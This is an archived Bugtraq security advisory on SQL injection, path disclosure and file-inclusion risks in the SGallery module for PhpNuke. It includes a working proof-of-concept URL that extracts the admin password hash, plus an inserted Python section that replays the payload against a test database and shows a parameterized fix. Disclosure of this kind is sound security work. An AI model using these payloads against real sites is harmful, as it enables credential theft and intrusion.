
List:       bugtraq
Subject:    [waraxe-2005-SA#039] - Critical Sql Injection in Sgallery module
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2005-01-12 22:55:07
Message-ID: 20050113030805.16723.qmail () www ! securityfocus ! com




{================================================================================}
{                              [waraxe-2005-SA#039]                              }
{================================================================================}
{                                                                                }
{             [ Critical Sql Injection in Sgallery module for PhpNuke ]          }
{                                                                                }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 12. January 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-39.html


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: SGallery
Module's Version: 1.01
Module's Description: Simple JPG image gallery
License: GNU/GPL
Author's Name: Sergey Kiselev
Author's Email: ser@acmetelecom.ru

Homepage: http://www.ser.acmetelecom.ru


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's look at source code from imageview.php:


----------------[ original code ]---------------

require_once("$DOCUMENT_ROOT/config.php");
require_once("$DOCUMENT_ROOT/includes/sql_layer.php");

  $dbi = sql_connect ($dbhost,$dbuname,$dbpass,$dbname);

  if ($idalbum) {
    $result = sql_query("select picture from ".$prefix."_SGalbums where idalbum=".$idalbum,$dbi);
  } elseif ($idimage) {
    $result = sql_query("select picture from ".$prefix."_SGimages where idimage=".$idimage,$dbi);
  }

  list($echo) = sql_fetch_row($result, $dbi);
  sql_free_result($result);

  sql_logout ($dbi);

  header ("Content-Type: image/jpeg");
  echo $echo;

----------------[ /original code ]---------------

Now let's analyze the weak points.


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If "$idalbum" and "$idimage" are both unset, the "if/elseif" construction has no "else"
branch, so "$result" is never assigned; with register_globals it can also be poisoned
through GET/POST/COOKIE. The following call to "sql_fetch_row()" then triggers a generic
PHP error message that reveals the script's filesystem path. Path disclosure is a
low-severity issue on its own, but it is useful for further malicious actions.


B - Potential arbitrary file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This kind of code construction as

require_once("$DOCUMENT_ROOT/config.php");
require_once("$DOCUMENT_ROOT/includes/sql_layer.php");

is not very secure. Depending on the web server vendor, version and configuration
settings (in particular whether a request can override "$DOCUMENT_ROOT" through
register_globals), it can lead to arbitrary local file inclusion and possibly remote
file inclusion.


C - Critical sql injection bug in "imageview.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Looking at the source code presented above, we can see insecure SQL queries sent to the
database. To be exact, the user-submitted variables "$idalbum" and/or "$idimage" are
concatenated into the "WHERE" clause of a "SELECT" without quoting or escaping, and
without being cast to an integer. This is clearly an SQL injection bug. Further
exploitation depends on the database software and version. In the case of MySQL 4.x,
where UNION is available, arbitrary data can be retrieved from the database, including
the admin(s) authentication credentials. Traditionally, here is the proof of concept:


----------------[ real life exploit ]---------------

http://localhost/nuke75/modules/Sgallery/imageview.php?idimage=-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1

----------------[/real life exploit ]---------------

The best browser to test this PoC is MSIE: it will display the admin password's md5 hash
as plain text. Firefox and other browsers will mostly render a "broken picture" because
of the "Content-Type: image/jpeg" header (the hash is still in the response body and can
be read with any tool that ignores the content type). Either way, the SQL injection
exists, can be exploited and must be fixed by the vendor as soon as possible.
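To make the injection and its fix concrete, here is an added example that is not part
of the advisory and not SGallery's code. It rebuilds the query from imageview.php in
Python against an in-memory sqlite3 stand-in for the two PhpNuke tables the advisory
names (MySQL is not needed: "/**/" is a comment in both MySQL and SQLite, so the
payload runs unchanged). The table prefix "nuke", the column layout, the md5 value and
the picture blob are constructed sample data. The hardened handler shows the usual fix
for this class of bug: accept only a decimal integer and bind it as a query parameter.

```python
import re
import sqlite3

# Constructed sample data standing in for the PhpNuke tables named in the advisory.
PREFIX = "nuke"
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # placeholder md5 hash, not real
JPEG_MAGIC = b"\xff\xd8\xff\xe0"  # stand-in for a stored picture blob

# The advisory's payload, verbatim. /**/ is a comment in both MySQL and SQLite,
# so it acts as whitespace and keeps the URL free of spaces.
PAYLOAD = "-99/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1"


def make_db():
    """Build an in-memory database with the two tables the advisory refers to."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {PREFIX}_SGimages (idimage INTEGER, picture BLOB);
        CREATE TABLE {PREFIX}_authors  (aid TEXT, pwd TEXT, radminsuper INTEGER);
        INSERT INTO {PREFIX}_SGimages VALUES (1, X'FFD8FFE0');
        INSERT INTO {PREFIX}_authors  VALUES ('God',    '{ADMIN_HASH}', 1);
        INSERT INTO {PREFIX}_authors  VALUES ('editor', 'not-an-admin-hash', 0);
    """)
    return db


def imageview_vulnerable(db, idimage):
    """Mirrors imageview.php: the request value is concatenated into the query unquoted."""
    sql = f"select picture from {PREFIX}_SGimages where idimage={idimage}"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def imageview_fixed(db, idimage):
    """Hardened form: accept only a decimal integer, then bind it as a parameter."""
    if not isinstance(idimage, str) or not re.fullmatch(r"[0-9]{1,10}", idimage):
        raise ValueError("idimage must be a decimal integer")
    sql = f"select picture from {PREFIX}_SGimages where idimage=?"
    row = db.execute(sql, (int(idimage),)).fetchone()
    return row[0] if row else None


def fix_rejects(db, idimage):
    """True if the hardened handler refuses the input instead of querying with it."""
    try:
        imageview_fixed(db, idimage)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legit:  ", imageview_vulnerable(db, "1"))      # the picture blob
    print("payload:", imageview_vulnerable(db, PAYLOAD))  # the admin hash, not a picture
    print("fixed:  ", fix_rejects(db, PAYLOAD))           # True
```

With the payload, the vulnerable handler's first (and only) row is the superadmin's
"pwd" value instead of a picture; the original script then echoes that string under an
"image/jpeg" content type, which is why MSIE showed it as text. The hardened handler
never lets the value reach the SQL text at all. A complete fix for imageview.php would
also add an "else" branch for the case where neither parameter is set (point A above).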


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Developer first contacted: 16. November 2004
No response from the developer after multiple emails.
The downloadable version of SGallery is still unpatched.

How to fix this security hole - http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Base64 encoder and decoder - http://base64-encoder-online.waraxe.us/
SiteMapper - free php script for phpNuke powered websites - http://sitemapper.waraxe.us/
It's an easy to install solution for making phpNuke more Google friendly!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to icenix, Raido Kerna, g0df4th3r and slimjim100!
Tervitused - Heintz!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

